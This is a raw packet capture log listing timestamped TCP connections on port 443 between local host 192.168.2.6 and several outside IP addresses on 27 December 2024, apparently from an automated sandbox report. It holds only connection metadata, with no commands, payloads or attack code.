                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871619940 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871632099 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871659994 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871679068 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871687889 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871700048 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871716022 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871722937 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871742964 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871754885 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871779919 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:02.871789932 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:03.947278023 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:03.950311899 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.011341095 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.011352062 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.021327019 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.021337032 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.844496012 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.844568014 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.844564915 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.844611883 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.883594990 CET50002443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.883630037 CET44350002188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998806953 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998863935 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998876095 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998899937 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998918056 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.998941898 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.999958992 CET50008443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:04.999973059 CET44350008188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.532104015 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.532145023 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.532218933 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.532584906 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.532601118 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.581687927 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.581707954 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.581815004 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.582036018 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.582045078 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.978431940 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.979768038 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:10.015110970 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:10.015124083 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:10.016824961 CET50031443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:10.016829967 CET44350031188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121023893 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121052980 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121119976 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121444941 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121455908 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121532917 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121809006 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121818066 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.122124910 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.122143030 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.138792992 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.139027119 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.139049053 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.140075922 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.140146971 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.143480062 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.143546104 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.148444891 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151293039 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151421070 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151771069 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151797056 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151932955 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152255058 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152296066 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152348995 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152375937 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152559996 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152570009 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.155240059 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.155354977 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156456947 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156622887 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156639099 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156721115 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156733036 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158006907 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158015966 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158057928 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158392906 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158410072 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158503056 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159565926 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159622908 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159849882 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159856081 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159931898 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160037041 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160048962 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160149097 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160528898 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160547018 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160638094 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160650969 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161215067 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161225080 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161346912 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161361933 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162010908 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162019968 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162153006 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162166119 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.163983107 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.164072990 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.164079905 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173594952 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173693895 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173702002 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186676025 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186729908 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186737061 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.191333055 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199337959 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199342966 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199376106 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199750900 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199904919 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199913979 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203336000 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203336000 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203339100 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203355074 CET44350051162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.213349104 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.213433981 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.625484943 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.625493050 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632843971 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632910013 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.632919073 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.634182930 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.634249926 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.640994072 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641094923 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641146898 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.641154051 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.642373085 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.644613981 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.644678116 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.647984982 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655548096 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655618906 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.655623913 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665123940 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665191889 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.665196896 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.676949978 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.677006006 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.677011967 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678648949 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678706884 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.678711891 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.684984922 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.685038090 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.685043097 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.691929102 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692022085 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692027092 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692071915 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.692176104 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.698788881 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713517904 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713615894 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713623047 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713648081 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713711023 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.713740110 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716738939 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716907024 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.716912985 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717634916 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717689037 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.717694998 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722248077 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722306013 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.722311974 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.726861000 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.727070093 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.727076054 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731545925 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731601000 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.731605053 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736145973 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736200094 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.736203909 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740757942 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740828037 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.740833998 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745235920 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745287895 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745292902 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745420933 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745496988 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.745554924 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.328676939 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.328777075 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.342693090 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.342732906 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343240976 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343491077 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.343502998 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358666897 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358771086 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358822107 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.358841896 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.366849899 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.367130995 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.367156982 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:13.368185997 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.084811926 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207066059 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207179070 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207181931 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.207273960 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271042109 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271109104 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271112919 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.271151066 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321589947 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321592093 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321615934 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321624041 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321675062 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321806908 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321854115 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321870089 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321966887 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321980953 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661716938 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661736965 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661861897 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661874056 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661890984 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.662142038 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664084911 CET50101443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664097071 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664366007 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.664381027 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.748852968 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.750366926 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.750377893 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.753758907 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.753823042 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754323006 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754403114 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.754430056 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.795337915 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.831937075 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834352016 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834367037 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.834716082 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838609934 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838691950 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.838783979 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.870992899 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.871010065 CET44350091162.159.61.3192.168.2.6
